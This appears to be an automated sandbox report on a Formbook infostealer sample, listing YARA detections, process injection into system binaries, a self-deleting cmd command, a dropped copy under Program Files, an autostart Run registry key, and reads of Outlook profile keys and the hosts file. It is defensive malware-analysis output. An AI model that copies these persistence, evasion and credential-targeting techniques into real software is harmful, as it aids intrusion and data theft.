          Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: fbfilex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: update4hg4upu.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/8@16/2
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Kx2adJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fbfilex.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Kx2adJump to behavior
          Source: fbfilex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\fbfilex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogri.iniJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: fbfilex.exeVirustotal: Detection: 38%
          Source: fbfilex.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\fbfilex.exeFile read: C:\Users\user\Desktop\fbfilex.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\fbfilex.exe 'C:\Users\user\Desktop\fbfilex.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\fbfilex.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\fbfilex.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\fbfilex.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe C:\Program Files (x86)\Kx2ad\update4hg4upu.exe
          Source: unknownProcess created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\fbfilex.exeProcess created: C:\Users\user\Desktop\fbfilex.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess created: C:\Users\user\Desktop\fbfilex.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe C:\Program Files (x86)\Kx2ad\update4hg4upu.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\fbfilex.exe'Jump to behavior
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeProcess created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile written: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogri.iniJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: fbfilex.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: fbfilex.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: update4hg4upu.exe, 0000001B.00000002.443206735.00000000019B0000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: update4hg4upu.exe, 0000001B.00000002.443206735.00000000019B0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: fbfilex.exe, 00000003.00000002.235411271.00000000030E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: fbfilex.exe, 00000003.00000002.234874086.0000000001450000.00000040.00000001.sdmp, update4hg4upu.exe, 0000001B.00000002.441078060.00000000016CF000.00000040.00000001.sdmp, ipconfig.exe, 0000001C.00000002.443365605.000000000384F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: fbfilex.exe, 00000003.00000002.234874086.0000000001450000.00000040.00000001.sdmp, update4hg4upu.exe, 0000001B.00000002.441078060.00000000016CF000.00000040.00000001.sdmp, ipconfig.exe, 0000001C.00000002.443365605.000000000384F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: fbfilex.exe, 00000003.00000002.235411271.00000000030E0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)Show sources
          Source: fbfilex.exe, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 1.2.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 1.0.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 2.2.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 2.0.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 3.0.fbfilex.exe.950000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 3.2.fbfilex.exe.950000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: update4hg4upu.exe.4.dr, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 24.0.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 24.2.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 27.2.update4hg4upu.exe.aa0000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 27.0.update4hg4upu.exe.aa0000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          .NET source code contains potential unpackerShow sources
          Source: fbfilex.exe, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.fbfilex.exe.950000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.fbfilex.exe.950000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: update4hg4upu.exe.4.dr, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.0.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.2.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.2.update4hg4upu.exe.aa0000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.0.update4hg4upu.exe.aa0000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs.Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E34AF push edi; retf 1_2_053E34B1
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E34A5 push edi; retf 1_2_053E34A7
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0040E37F push ds; iretd 3_2_0040E3C1
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0040E335 push ds; iretd 3_2_0040E3C1
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00416C6C pushfd ; iretd 3_2_00416C6D
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0040E416 pushad ; ret 3_2_0040E41D
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041CDF5 push eax; ret 3_2_0041CE48
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041CE42 push eax; ret 3_2_0041CE48
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041CE4B push eax; ret 3_2_0041CEB2
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041CEAC push eax; ret 3_2_0041CEB2
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD9CD2 push FFFFFF94h; ret 24_2_04DD9CD4
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD34AF push edi; retf 24_2_04DD34B1
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD34A5 push edi; retf 24_2_04DD34A7
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD9ED2 push edi; iretd 24_2_04DD9ED9
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD6E1F pushfd ; retf 24_2_04DD6E23
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD1750 push 2C02777Fh; iretd 24_2_04DD1755
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDB11C push edx; retf 24_2_04DDB11E
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDB112 push edx; retf 24_2_04DDB114
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0040E37F push ds; iretd 27_2_0040E3C1
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0040E335 push ds; iretd 27_2_0040E3C1
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00416C6C pushfd ; iretd 27_2_00416C6D
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0040E416 pushad ; ret 27_2_0040E41D
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041CDF5 push eax; ret 27_2_0041CE48
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041CE42 push eax; ret 27_2_0041CE48
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041CE4B push eax; ret 27_2_0041CEB2
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041CEAC push eax; ret 27_2_0041CEB2
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85113271284
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85113271284

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Kx2ad\update4hg4upu.exeJump to dropped file

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\msdt.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run T8TP5LRPRPJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior